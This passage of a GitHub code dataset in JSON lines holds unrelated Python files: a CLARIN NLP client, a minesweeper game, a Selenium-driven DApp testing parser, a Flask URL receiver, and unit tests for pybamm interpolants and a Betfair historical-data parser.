json.load(resp)\n\n while data[\"status\"] == \"QUEUE\" or data[\"status\"] == \"PROCESSING\":\n time.sleep(0.5)\n resp = urlopen(Request(url + '/getStatus/' + task_id))\n data = json.load(resp)\n\n if data[\"status\"] == \"ERROR\":\n print(\"Error \" + data[\"value\"])\n return None, data['value']\n\n return data[\"value\"], None\n\n\nasync def process(document_id, text, model, out='downloads/'):\n \"\"\"\n Processes text by using clarin services\n :param out: path to output directory\n :param model: liner2 model name\n :param document_id: uuid\n :param text: string\n :return: result file path\n \"\"\"\n\n file_id = upload(text)\n data = {\n 'lpmn': 'any2txt|wcrft2({\"morfeusz2\":false})|liner2({\"model\":\"'+model+'\"})',\n 'user': 'geocoder',\n 'file': file_id\n }\n\n response, errors = start_task(data)\n\n if errors is not None:\n return {'errors': errors}\n\n if response is not None:\n response = response[0][\"fileID\"]\n content = urlopen(Request(url + '/download' + 
response)).read().decode()\n with open(out + os.path.basename(document_id) + '.' + model, \"w\") as outfile:\n outfile.write(content)\n\n return {'model': model,\n 'path': out + os.path.basename(document_id) + '.' + model,\n 'errors': None}\n","repo_name":"CLARIN-PL/text-geocoder","sub_path":"text_geocoder/api/v1/ws_clarin.py","file_name":"ws_clarin.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"6263663257","text":"import os\nimport unittest\n\nfrom genofunc.extract_metadata import *\n\nthis_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\ndata_dir = os.path.join(this_dir, 'tests', 'data')\n\nclass TestExtractMetadata(unittest.TestCase):\n def test_run_extract_metadata(self):\n in_fasta = \"%s/sequences/seqB.fasta\" %data_dir\n in_metadata = \"%s/metadata/metadataB.tsv\" %data_dir\n column = [\"country\"]\n index_field = \"strain\"\n out_fasta = \"%s/output/tmp.extract.fasta\" %data_dir\n out_metadata = \"%s/output/tmp.extracted_metadata.csv\" %data_dir\n log_file = \"%s/output/extract_metadata.log\" %data_dir\n extract_metadata(in_fasta, in_metadata, column, index_field, out_fasta, out_metadata, log_file)\n os.unlink(out_fasta)\n os.unlink(out_metadata)\n os.unlink(log_file)\n","repo_name":"xiaoyu518/genofunc","sub_path":"tests/extract_metadata_test.py","file_name":"extract_metadata_test.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"1142024488","text":"from tkinter import Button, Label\nimport random\nimport sys\nimport config\n\n\nclass Cell:\n all = []\n cell_count = config.cell_count\n mine_count = config.mine_count\n mine_count_label = None\n\n def __init__(self, x, y, is_mine = False):\n self.x = x \n self.y = y\n self.is_mine = is_mine\n self.button = None\n self.is_open = False\n self.can_be_mine = False\n\n 
Cell.all.append(self)\n\n def create_button(self, location):\n button = Button(location, \n bg = \"lightpink2\",\n width = 1, \n height = 1) \n \n button.bind(\"\", self.left_click)\n button.bind(\"\", self.right_click)\n\n self.button = button\n\n @staticmethod\n def create_mine_count_label(location):\n label = Label(\n location,\n bg = \"light blue\",\n fg = \"black\",\n text = f\"Flags: {Cell.mine_count}\",\n font = (\"12\") \n )\n Cell.mine_count_label = label\n\n def left_click(self, event):\n if self.is_mine:\n self.show_mine()\n else:\n if self.surrounding_mine_count == 0:\n for cell in self.surrounding_cells:\n cell.show_cell()\n self.show_cell()\n \n if Cell.cell_count == config.mine_count:\n sys.exit()\n\n self.button.unbind(\"\")\n self.button.unbind(\"\")\n\n def cell_axis(self, x, y):\n for cell in Cell.all:\n if cell.x == x and cell.y == y:\n return cell\n\n @property \n def surrounding_cells(self):\n cells = [self.cell_axis(self.x-1, self.y-1),\n self.cell_axis(self.x, self.y-1),\n self.cell_axis(self.x+1, self.y-1),\n self.cell_axis(self.x+1, self.y),\n self.cell_axis(self.x+1, self.y+1),\n self.cell_axis(self.x, self.y+1),\n self.cell_axis(self.x-1, self.y+1),\n self.cell_axis(self.x-1, self.y),\n ]\n cells = [cell for cell in cells if cell is not None]\n return cells\n\n @property \n def surrounding_mine_count(self):\n count = 0\n for cell in self.surrounding_cells:\n if cell.is_mine:\n count += 1\n return count\n \n def show_cell(self):\n if not self.is_open:\n Cell.cell_count -= 1\n self.button.configure(text = self.surrounding_mine_count)\n self.button.configure(bg = \"lightpink2\")\n self.is_open = True\n\n def show_mine(self):\n self.button.configure(bg = \"red\")\n\n def right_click(self, event):\n if not self.can_be_mine:\n self.button.configure(bg = \"deep pink\")\n self.can_be_mine = True\n Cell.mine_count -= 1\n if Cell.mine_count_label:\n Cell.mine_count_label.configure(text = f\"Flags: {Cell.mine_count}\")\n else:\n 
self.button.configure(bg = \"lightpink2\")\n self.can_be_mine = False\n\n @staticmethod\n def random_mines():\n chosen_cells = random.sample(Cell.all, config.mine_count)\n for cell in chosen_cells:\n cell.is_mine = True\n\n def __repr__(self):\n return f\"Cell{self.x}, {self.y}\"","repo_name":"smilinh21/mine_sweeper","sub_path":"board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":3362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"33926668393","text":"import time\n\nfrom selenium.common.exceptions import NoSuchElementException, JavascriptException\nfrom selenium.webdriver.common.by import By\n\nfrom py2neo import Graph, NodeMatcher, RelationshipMatcher, Node\n\nfrom util.configuration import config\nfrom util.utils import detect_path_trace\nfrom util.browser import Chrome\nfrom util.environment import env, EnvKey\n\n\nclass Parser:\n\n def __init__(self, chrome: Chrome):\n self.driver = chrome.driver\n self.chrome = chrome\n graph = Graph(config['neo4j']['host'],\n auth=(config['neo4j']['username'], config['neo4j']['password']),\n name=config['neo4j']['name'])\n self.node_matcher = NodeMatcher(graph)\n self.relationship_matcher = RelationshipMatcher(graph)\n self.display_element_xpath = config['debug']['display-element-xpath']\n\n # 执行抽象的检测过程\n def handle(self) -> bool:\n window_handles = self.driver.window_handles\n if len(window_handles) > 1:\n self.driver.switch_to.window(window_handles[0])\n # 获取开始节点\n start_node = self.node_matcher.match('Intention', name='start').first()\n return self.execute_abstract_step(start_node)\n\n def execute_abstract_step(self, prev_node: Node) -> bool:\n # 遍历每一条关系\n r_type = 'next'\n current_detect_status = False\n current_detect_node = None\n next_intention_nodes = sorted([next_rel.end_node for next_rel in\n self.relationship_matcher.match((prev_node, None), r_type=r_type).all()],\n key=lambda x: x.get('bias') or 100, reverse=True)\n for cur_node in 
next_intention_nodes:\n # 判断是否满足当前关系成立的条件\n execute_real_step_result = self.execute_real_step(cur_node)\n if execute_real_step_result:\n intention_path = env.get(EnvKey.INTENTION_PATH, [])\n intention_path.append(cur_node.get('name'))\n env.set(EnvKey.INTENTION_PATH, intention_path)\n current_detect_node = cur_node\n current_detect_status = True\n break\n # 如果检测失败,则直接退出\n if not current_detect_status or current_detect_node is None:\n return False\n if current_detect_node.get('name') == 'end':\n return True\n # 如果检测成功,当前节点不为end则继续执行\n return self.execute_abstract_step(current_detect_node)\n\n # 执行具体的检测步骤\n @detect_path_trace\n def execute_real_step(self, detect_node: Node) -> bool:\n # 获取开始节点\n impl_r_type = 'impl'\n impl_relationship = self.relationship_matcher.match((detect_node, None), r_type=impl_r_type).first()\n # 如果开始节点为空,则直接返回True\n if impl_relationship is None or impl_relationship.end_node is None:\n return True\n start_node = impl_relationship.end_node\n return self.execute_basic_step(start_node)\n\n # 执行Action\n def execute_basic_step(self, prev_node: Node) -> bool:\n # 遍历每一条关系\n current_operate_status = False\n current_operate_node = None\n next_r_type = 'next'\n next_nodes = sorted([next_rel.end_node for next_rel in\n self.relationship_matcher.match((prev_node, None), r_type=next_r_type).all()],\n key=lambda x: x.get('bias') or 100, reverse=True)\n self.wait_elements(next_nodes)\n for cur_node in next_nodes:\n # 判断是否满足当前关系成立的条件\n execute_operation_status = self.execute_operation(cur_node)\n if execute_operation_status:\n current_operate_node = cur_node\n current_operate_status = True\n break\n # 如果执行失败,则直接退出\n if not current_operate_status or current_operate_node is None:\n return False\n # 如果检测成功,且当前节点为end\n if current_operate_node.get('name') == 'end':\n return True\n # 如果检测成功,当前节点不为end则继续执行\n return self.execute_basic_step(current_operate_node)\n\n # 循环检查页面是否准备就绪\n def wait_elements(self, next_nodes):\n # 如果当前是start、end,直接返回\n if len(next_nodes) == 1 
and next_nodes[0].get('operation') in ['start', 'end']:\n return True\n count = 0\n\n origin_window_handle = self.driver.current_window_handle\n max_wait_time = config['dapp']['wait-time']\n for next_node in next_nodes:\n max_wait_time = max(next_node.get('wait-time', max_wait_time), max_wait_time)\n\n while count < max_wait_time:\n for next_node in next_nodes:\n operation = next_node.get('operation', 'start')\n keywords = next_node.get('keywords', [])\n sort = next_node.get('sort', 'asc')\n tags = next_node.get('tags', [])\n scope = next_node.get('scope', 'web')\n xpath = next_node.get('xpath', None)\n find_elements = False\n switch_another_window, step_info_frame = False, False\n if scope == 'wallet':\n # 如果没有切换到钱包,则直接进行下一个操作\n if not self.switch_to_wallet_window_handle():\n continue\n switch_another_window = True\n if operation in ['start', 'end']:\n continue\n if operation in ['exist']:\n keywords = self.get_exist_keywords(next_node.get('extra_data', 'account'))\n\n if xpath:\n try:\n self.driver.find_element(By.XPATH, xpath)\n find_elements = True\n except NoSuchElementException:\n continue\n elif keywords:\n executable_elements, step_info_frame = self.chrome.get_target_executable_elements_by_keywords(\n keywords=keywords,\n tags=tags,\n sort=sort)\n find_elements = len(executable_elements) > 0\n if step_info_frame or switch_another_window:\n self.chrome.driver.switch_to.window(origin_window_handle)\n\n if find_elements:\n return\n time.sleep(1)\n count += 1\n\n def get_exist_keywords(self, extra_data):\n keywords = []\n if extra_data == 'account':\n # 获取钱包账户地址,如果不存在直接返回False,如果存在则截取最后四位\n try:\n account = self.driver.execute_script('return window.ethereum.selectedAddress')\n if account is not None:\n keywords += [\n 'web3-status-connected',\n '...' + account[len(account) - 4:],\n account[:3] + '...' 
+ account[len(account) - 4:],\n account[:5],\n ]\n except JavascriptException:\n pass\n return keywords\n\n def switch_to_wallet_window_handle(self):\n current_url = self.driver.current_url\n wallet_id = config['chrome']['metamask']['id']\n if wallet_id in current_url:\n return True\n all_window_handles = self.driver.window_handles\n if len(all_window_handles) == 1:\n return False\n self.chrome.driver.switch_to.window(all_window_handles[-1])\n return True\n\n # 解释执行器\n @detect_path_trace\n def execute_operation(self, node: Node) -> bool:\n # 检测node是否合法\n if 'Action' not in node.labels:\n return False\n\n # 如果是exist需要提前从data中取出关键字,然后作为关键字进行查找\n operation = node.get('operation', 'start')\n sort = node.get('sort', 'asc')\n scope = node.get('scope', 'web')\n xpath = node.get('xpath', None)\n tags = node.get('tags', None)\n keywords = node.get('keywords', None)\n key = node.get('key', None)\n\n if operation in ['start', 'end']:\n return True\n if operation in ['exist'] and (not keywords and not node.get('data', None)):\n return False\n if operation not in ['exist'] and (not keywords and not xpath):\n return False\n if operation in ['record'] and (not key):\n return False\n\n step_info_frame = False\n switch_another_window = False\n\n # 如果scope为钱包,判断是否需打开新的window\n origin_window_handle = self.driver.current_window_handle\n all_window_handles = self.driver.window_handles\n\n if scope == 'wallet':\n if len(all_window_handles) == 1:\n return False\n current_url = self.driver.current_url\n wallet_id = config['chrome']['metamask']['id']\n if wallet_id not in current_url:\n self.chrome.driver.switch_to.window(all_window_handles[-1])\n switch_another_window = True\n\n # 根据xpath或keywords查找相关元素\n result = False\n executable_elements = []\n\n if xpath:\n executable_elements, step_info_frame = self.chrome.get_target_executable_elements_by_xpath(xpath)\n elif keywords:\n executable_elements, step_info_frame = self.chrome.get_target_executable_elements_by_keywords(keywords,\n tags,\n 
sort)\n # 根据operation类型进行相关处理\n if operation == 'exist':\n key = node.get('extra_data', 'account')\n if key == 'account':\n account = self.driver.execute_script('return window.ethereum.selectedAddress')\n result = account is not None\n else:\n keywords = self.get_exist_keywords(node.get('extra_data', 'account'))\n result = keywords and self.execute_exist(keywords, node)\n elif operation == 'click':\n result = len(executable_elements) > 0 and self.execute_click(executable_elements, node)\n elif operation == 'input':\n result = len(executable_elements) > 0 and self.execute_input(executable_elements, node)\n elif operation == 'record':\n result = len(executable_elements) > 0 and self.execute_record(executable_elements, node)\n if step_info_frame or switch_another_window:\n self.chrome.driver.switch_to.window(origin_window_handle)\n return result\n\n # 执行点击操作\n def execute_click(self, element_info_list: [{}], node: Node) -> bool:\n # 执行之前记录页面html\n self.chrome.record_page_html()\n # 记录窗口数量\n self.chrome.record_window_handles()\n\n def find_suitable_element(cur_executable_element, cur_xpath):\n if cur_xpath.endswith('/button') or '/button/' not in cur_xpath:\n return cur_executable_element, cur_xpath\n suit_xpath = cur_xpath.split('/button/')[0] + '/button'\n suit_element = self.chrome.get_element(By.XPATH, suit_xpath)\n return suit_element, suit_xpath\n\n for element_info in element_info_list:\n # 向上寻找合适的元素\n element, xpath = find_suitable_element(element_info['web_element'], element_info['xpath'])\n self.display_element_xpath and print(xpath)\n if self.chrome.click_element(executable_element=element,\n xpath=xpath,\n check_change=True):\n return True\n return False\n\n # 执行输入操作\n def execute_input(self, element_info_list: [{}], node: Node) -> bool:\n # 执行之前记录页面html\n self.chrome.record_page_html()\n for element_info in element_info_list:\n self.display_element_xpath and print(element_info['xpath'])\n if 
self.chrome.input_element(executable_element=element_info['web_element'],\n xpath=element_info['xpath'],\n input_value=config['dapp']['input-amount'],\n check_change=True):\n return True\n return False\n\n # 执行记录操作\n def execute_record(self, element_info_list: [{}], node: Node) -> bool:\n key, result = node.get('key'), []\n for element_info in element_info_list:\n html_element, executable_element = element_info['html_element'], element_info['web_element']\n if html_element.tag in ['input']:\n wait_time = node.get('wait-time', config['dapp']['wait-time'])\n retry_count = 0\n value = None\n disabled = executable_element.get_attribute('disabled')\n if disabled:\n placeholder = executable_element.get_attribute('placeholder')\n if placeholder:\n value = placeholder\n while retry_count < wait_time and not value:\n value = executable_element.get_attribute('value')\n if not value or value in ['0', '0.0']:\n executable_element = self.driver.find_element(By.XPATH, element_info['xpath'])\n value = None\n time.sleep(1)\n retry_count += 1\n result.append(value)\n else:\n result += list(html_element.itertext())\n page_state = env.get(EnvKey.PAGE_STATE, {})\n stripped = []\n for r in result:\n if r.strip():\n stripped.append(r.strip())\n page_state[key] = stripped\n env.set(EnvKey.PAGE_STATE, page_state)\n return True\n\n # 执行判断存在操作\n def execute_exist(self, keywords: [str], node: Node) -> bool:\n html = self.chrome.html.lower()\n for keyword in keywords:\n if keyword.lower() in html:\n return True\n return False\n","repo_name":"HuskiesUESTC/DAppHunter","sub_path":"util/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":14605,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"19211736335","text":"class Conversion:\n\n def Decimal_To_Binary(self, Decimal, User_Answer=0):\n if User_Answer == 3:\n return int(Decimal, 2)\n\n else:\n Binary = bin(Decimal).replace(\"0b\", \"\")\n return Binary\n\n def 
test(self, Answer=''):\n User_Answer = input(\">>\")\n if f'{Answer}' == User_Answer:\n print(\"정답\\n\")\n else:\n self.test(Answer)\n","repo_name":"PJO2004/conversion_binary_test","sub_path":"API/conversion.py","file_name":"conversion.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"18189138216","text":"from src.sql.connect import connect_sql\nfrom src.datacls.user_f import User, ActiveUserList\nimport json\n\nclass MixUiAttri:\n \"\"\"\n 记录非初始化之外的属性和相关的维护\n \"\"\"\n\n def get_item_info(self, sid):\n\n connection,cursor = connect_sql()\n\n # SQL query\n query = \"SELECT * FROM item_info WHERE sid = %s\"\n cursor.execute(query, (sid,)) \n result = cursor.fetchone()\n\n # Close the cursor and the connection\n cursor.close()\n connection.close()\n \n if result:\n json_fields = ['tags', 'infobox', 'collection', \"count\", 'images'] # Add any other fields that are stored as JSON\n for field in json_fields:\n if result.get(field):\n result[field] = json.loads(result[field])\n\n return result\n\n\n def fetch_user_map(self):\n connection, cursor = connect_sql()\n\n # 查询所有记录\n cursor.execute('SELECT uid, uname FROM user_mapping')\n records = cursor.fetchall()\n\n cursor.close()\n connection.close()\n data = records\n\n # 构建两个字典\n self.uid_to_uname = {record[0]: record[1] for record in data}\n self.uname_to_uid = {record[1]: record[0] for record in data}\n\n def add_user(self, uid):\n u = User()\n u.uid = uid\n self.user_dict[uid] = u\n\n def get_user(self, uid):\n if uid not in self.user_dict.keys():\n self.add_user(uid)\n return self.user_dict[uid]\n","repo_name":"klove2020/bangrecs","sub_path":"src/datacls/mix/mix_ui_attri_f.py","file_name":"mix_ui_attri_f.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"29430093985","text":"#\n# Tests for the Function 
classes\n#\nimport pybamm\n\nimport unittest\nimport numpy as np\n\n\nclass TestInterpolant(unittest.TestCase):\n def test_errors(self):\n with self.assertRaisesRegex(ValueError, \"data should have exactly two columns\"):\n pybamm.Interpolant(np.ones(10), None)\n with self.assertRaisesRegex(ValueError, \"interpolator 'bla' not recognised\"):\n pybamm.Interpolant(np.ones((10, 2)), None, interpolator=\"bla\")\n\n def test_interpolation(self):\n x = np.linspace(0, 1)[:, np.newaxis]\n y = pybamm.StateVector(slice(0, 2))\n # linear\n linear = np.hstack([x, 2 * x])\n for interpolator in [\"pchip\", \"cubic spline\"]:\n interp = pybamm.Interpolant(linear, y, interpolator=interpolator)\n np.testing.assert_array_almost_equal(\n interp.evaluate(y=np.array([0.397, 1.5]))[:, 0], np.array([0.794, 3])\n )\n # square\n square = np.hstack([x, x ** 2])\n y = pybamm.StateVector(slice(0, 1))\n for interpolator in [\"pchip\", \"cubic spline\"]:\n interp = pybamm.Interpolant(square, y, interpolator=interpolator)\n np.testing.assert_array_almost_equal(\n interp.evaluate(y=np.array([0.397]))[:, 0], np.array([0.397 ** 2])\n )\n\n # with extrapolation set to False\n for interpolator in [\"pchip\", \"cubic spline\"]:\n interp = pybamm.Interpolant(\n square, y, interpolator=interpolator, extrapolate=False\n )\n np.testing.assert_array_equal(\n interp.evaluate(y=np.array([2]))[:, 0], np.array([np.nan])\n )\n\n def test_name(self):\n a = pybamm.Symbol(\"a\")\n x = np.linspace(0, 1)[:, np.newaxis]\n interp = pybamm.Interpolant(np.hstack([x, x]), a, \"name\")\n self.assertEqual(interp.name, \"interpolating function (name)\")\n\n def test_diff(self):\n x = np.linspace(0, 1)[:, np.newaxis]\n y = pybamm.StateVector(slice(0, 2))\n # linear (derivative should be 2)\n linear = np.hstack([x, 2 * x])\n for interpolator in [\"pchip\", \"cubic spline\"]:\n interp_diff = pybamm.Interpolant(linear, y, interpolator=interpolator).diff(\n y\n )\n np.testing.assert_array_almost_equal(\n 
interp_diff.evaluate(y=np.array([0.397, 1.5]))[:, 0], np.array([2, 2])\n )\n # square (derivative should be 2*x)\n square = np.hstack([x, x ** 2])\n for interpolator in [\"pchip\", \"cubic spline\"]:\n interp_diff = pybamm.Interpolant(square, y, interpolator=interpolator).diff(\n y\n )\n np.testing.assert_array_almost_equal(\n interp_diff.evaluate(y=np.array([0.397, 0.806]))[:, 0],\n np.array([0.794, 1.612]),\n decimal=3,\n )\n\n def test_processing(self):\n x = np.linspace(0, 1)[:, np.newaxis]\n y = pybamm.StateVector(slice(0, 2))\n linear = np.hstack([x, 2 * x])\n interp = pybamm.Interpolant(linear, y)\n\n self.assertEqual(interp.id, interp.new_copy().id)\n self.assertEqual(interp.id, interp.simplify().id)\n\n\nif __name__ == \"__main__\":\n print(\"Add -v for more debug output\")\n import sys\n\n if \"-v\" in sys.argv:\n debug = True\n pybamm.settings.debug_mode = True\n unittest.main()\n","repo_name":"zlgenuine/pybamm","sub_path":"tests/unit/test_expression_tree/test_interpolant.py","file_name":"test_interpolant.py","file_ext":"py","file_size_in_byte":3401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"44020414493","text":"from flask import Flask, request, jsonify, send_file\n\napp = Flask(__name__)\n\n# Existing endpoint to receive a YouTube URL\n@app.route('/receive-youtube-url', methods=['POST'])\ndef receive_youtube_url():\n data = request.get_json()\n youtube_url = data.get('youtubeURL')\n \n # Process the YouTube URL as needed\n with open('youtube_url.text', 'w') as file:\n file.write(youtube_url)\n \n return jsonify({'message': 'YouTube URL received'})\n\n# New endpoint to receive a URL from Streamlit\n@app.route('/send-url', methods=['POST'])\ndef send_url():\n data = request.get_json()\n url = data.get('url')\n \n # Write the URL to a text file\n with open('url.txt', 'w') as file:\n file.write(url)\n \n # Return a response to the extension\n print(url)\n return jsonify({\"message\": \"URL 
received and saved to file\"})\n\n# New endpoint to serve the content of the url.txt file\n@app.route('/get-url-file', methods=['GET'])\ndef get_url_file():\n try:\n with open('url.txt', 'r') as file:\n url = file.read()\n return jsonify({\"url\": url}) # Return the URL within a JSON response\n except Exception as e:\n return jsonify({\"error\": str(e)}) # Handle errors and return them as JSON\n\n\nif __name__ == '__main__':\n app.run(host='localhost', port=5001)","repo_name":"mohandasnj/seeknspot","sub_path":"seeknspot_streamlit/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"23379845515","text":"\"\"\"\nThis file tests the functionality of BetfairHistoricalFileParser\n\"\"\"\nimport bz2\nimport json\nimport os\n\nimport pytest\nfrom jsonschema.exceptions import ValidationError\n\nfrom betfairHistorical import BetfairHistoricalFileParser\nfrom betfairHistorical.exceptions import InvalidMarket, InvalidMarketChange\n\nTEST_DATA_LOCAL_DIR = os.path.join(os.getcwd(), 'sample_data')\nTEST_DATA_LOCAL_FILE = os.path.join(TEST_DATA_LOCAL_DIR, 'football-basic-sample.bz2')\n\nwith bz2.open(TEST_DATA_LOCAL_FILE) as f:\n\tCONTENTS = f.readlines()\n\nparser = BetfairHistoricalFileParser(\n\t\tlocal_path=TEST_DATA_LOCAL_DIR,\n\t\tsport=\"soccer\",\n\t\tplan=\"basic\",\n\t\tmarket=\"match_odds\",\n\t\trecursive=True,\n\t\tvalidate=False\n\t)\n\nevent = parser.data[0][0]\nmarket = json.loads(event.decode())\nmarket_change = market.get('mc')[8]\t# contains both marketDefinition and rc\n\n\nclass TestBetfairHistoricalFileParser:\n\n\t# Init tests\n\tdef test_local_path_not_exists(self):\n\t\twith pytest.raises(FileExistsError):\n\t\t\tBetfairHistoricalFileParser(\n\t\t\t\tlocal_path=\"This is not a path\",\n\t\t\t\tsport=\"soccer\",\n\t\t\t\tplan=\"basic\",\n\t\t\t\tmarket=\"match_odds\"\n\t\t\t)\n\n\tdef 
test_sport_not_in_supported_markets(self):\n\t\twith pytest.raises(NotImplementedError):\n\t\t\tBetfairHistoricalFileParser(\n\t\t\t\tlocal_path=TEST_DATA_LOCAL_DIR,\n\t\t\t\tsport=\"animals\",\n\t\t\t\tplan=\"basic\",\n\t\t\t\tmarket=\"match_odds\",\n\t\t\t\tvalidate=True\n\t\t\t)\n\n\tdef test_plan_not_in_supported_plans(self):\n\t\twith pytest.raises(NotImplementedError):\n\t\t\tBetfairHistoricalFileParser(\n\t\t\t\tlocal_path=TEST_DATA_LOCAL_DIR,\n\t\t\t\tsport=\"soccer\",\n\t\t\t\tplan=\"imaginary\",\n\t\t\t\tmarket=\"match_odds\",\n\t\t\t\tvalidate=True\n\t\t\t)\n\n\tdef test_market_not_in_supported_markets(self):\n\t\twith pytest.raises(NotImplementedError):\n\t\t\tBetfairHistoricalFileParser(\n\t\t\t\tlocal_path=TEST_DATA_LOCAL_DIR,\n\t\t\t\tsport=\"soccer\",\n\t\t\t\tplan=\"basic\",\n\t\t\t\tmarket=\"piegate\",\n\t\t\t\tvalidate=True\n\t\t\t)\n\n\t# _read_files tests\n\tdef test_read_files_returns_expected_data(self):\n\t\tassert parser._read_file(TEST_DATA_LOCAL_FILE) == CONTENTS\n\n\tdef test_read_files_recursively_returns_data(self):\n\t\tassert parser.data == [CONTENTS]\n\n\t# _validate_schema tests\n\tdef test_validate_schema_with_default(self):\n\t\tdefault_schema_parser = BetfairHistoricalFileParser(\n\t\t\tlocal_path=TEST_DATA_LOCAL_DIR,\n\t\t\tsport=\"soccer\",\n\t\t\tplan=\"basic\",\n\t\t\tmarket=\"match_odds\",\n\t\t\trecursive=True,\n\t\t\tvalidate=False\n\t\t\t)\n\t\tassert not default_schema_parser._validate_schema(CONTENTS)\n\n\tdef test_validate_schema_with_supplied_schema(self):\n\t\tpassed_schema_parser = BetfairHistoricalFileParser(\n\t\t\tlocal_path=TEST_DATA_LOCAL_DIR,\n\t\t\tsport=\"soccer\",\n\t\t\tplan=\"basic\",\n\t\t\tmarket=\"match_odds\",\n\t\t\trecursive=True,\n\t\t\tvalidate=False,\n\t\t\tvalidation_schema={}\t# allows all valid dicts\n\t\t\t)\n\t\tassert not passed_schema_parser._validate_schema(CONTENTS)\n\n\tdef test_validate_schema_fails_on_invalid(self):\n\t\tinvalid_parser = 
BetfairHistoricalFileParser(\n\t\t\tlocal_path=TEST_DATA_LOCAL_DIR,\n\t\t\tsport=\"soccer\",\n\t\t\tplan=\"basic\",\n\t\t\tmarket=\"match_odds\",\n\t\t\trecursive=True,\n\t\t\tvalidate=False,\n\t\t\tvalidation_schema={\"type\": \"number\"}\n\t\t\t)\n\t\twith pytest.raises(ValidationError):\n\t\t\tinvalid_parser._validate_schema(CONTENTS)\t\t\t\n\n\t# get_market_change_id tests\n\tdef test_get_market_change_with_id(self):\n\t\tmc_id = parser.get_market_change_id(market_change)\n\t\tassert mc_id == \"1.131162722\"\n\n\tdef test_get_market_change_no_id(self):\n\t\twith pytest.raises(InvalidMarketChange):\n\t\t\tparser.get_market_change_id({})\n\n\t# get_market_definition tests\n\tdef test_get_market_definition_with_marketDefinition(self):\n\t\tmd = parser.get_market_definition(market_change)\n\t\texpected_md = {\n\t\t\t'betDelay': 0,\n\t\t\t'bettingType': 'ODDS',\n\t\t\t'bspMarket': False,\n\t\t\t'bspReconciled': False,\n\t\t\t'complete': True,\n\t\t\t'countryCode': 'GB',\n\t\t\t'crossMatching': True,\n\t\t\t'discountAllowed': True,\n\t\t\t'eventId': '28202626',\n\t\t\t'eventName': 'Middlesbrough v Man City',\n\t\t\t'eventTypeId': '1',\n\t\t\t'inPlay': False,\n\t\t\t'marketBaseRate': 5.0,\n\t\t\t'marketTime': '2017-04-30T13:05:00.000Z',\n\t\t\t'marketType': 'HALF_TIME_FULL_TIME',\n\t\t\t'name': 'Half Time/Full Time',\n\t\t\t'numberOfActiveRunners': 9,\n\t\t\t'numberOfWinners': 1,\n\t\t\t'openDate': '2017-04-30T13:05:00.000Z',\n\t\t\t'persistenceEnabled': True,\n\t\t\t'regulators': ['MR_INT'],\n\t\t\t'runners': [\n\t\t\t\t{\n\t\t\t\t\t'id': 71080,\n\t\t\t\t\t'name': 'Middlesbrough/Middlesbrough',\n\t\t\t\t\t'sortPriority': 1,\n\t\t\t\t\t'status': 'ACTIVE'\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t'id': 71079,\n\t\t\t\t\t'name': 'Middlesbrough/Draw',\n\t\t\t\t\t'sortPriority': 2,\n\t\t\t\t\t'status': 'ACTIVE'\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t'id': 261273,\n\t\t\t\t\t'name': 'Middlesbrough/Man City',\n\t\t\t\t\t'sortPriority': 3,\n\t\t\t\t\t'status': 
'ACTIVE'\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t'id': 71081,\n\t\t\t\t\t'name': 'Draw/Middlesbrough',\n\t\t\t\t\t'sortPriority': 4,\n\t\t\t\t\t'status': 'ACTIVE'\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t'id': 3710152,\n\t\t\t\t\t'name': 'Draw/Draw',\n\t\t\t\t\t'sortPriority': 5,\n\t\t\t\t\t'status': 'ACTIVE'\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t'id': 69426,\n\t\t\t\t\t'name': 'Draw/Man City',\n\t\t\t\t\t'sortPriority': 6,\n\t\t\t\t\t'status': 'ACTIVE'\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t'id': 3507812,\n\t\t\t\t\t'name': 'Man City/Middlesbrough',\n\t\t\t\t\t'sortPriority': 7,\n\t\t\t\t\t'status': 'ACTIVE'\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t'id': 69424,\n\t\t\t\t\t'name': 'Man City/Draw',\n\t\t\t\t\t'sortPriority': 8,\n\t\t\t\t\t'status': 'ACTIVE'\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t'id': 69423,\n\t\t\t\t\t'name': 'Man City/Man City',\n\t\t\t\t\t'sortPriority': 9,\n\t\t\t\t\t'status': 'ACTIVE'\n\t\t\t\t}\n\t\t\t],\n\t\t\t'runnersVoidable': False,\n\t\t\t'status': 'OPEN',\n\t\t\t'suspendTime': '2017-04-30T13:05:00.000Z',\n\t\t\t'timezone': 'Europe/London',\n\t\t\t'turnInPlayEnabled': True,\n\t\t\t'version': 1624812955\n\t\t}\n\n\t\tassert md == expected_md\n\n\tdef test_get_market_definition_no_marketDefintion(self):\n\t\tmd = parser.get_market_definition({})\n\t\tassert not md\n\n\t# get_runner_change tests\n\tdef test_get_runner_change_with_rc(self):\n\t\trc = parser.get_runner_change(market_change)\n\t\tassert rc == [{'ltp': 2.1, 'id': 69423}, {'ltp': 25.0, 'id': 71080}]\n\n\tdef test_get_runner_change_no_rc(self):\n\t\trc = parser.get_runner_change({})\n\t\tassert not rc\n\t\n\t# get_published_time tests\n\tdef 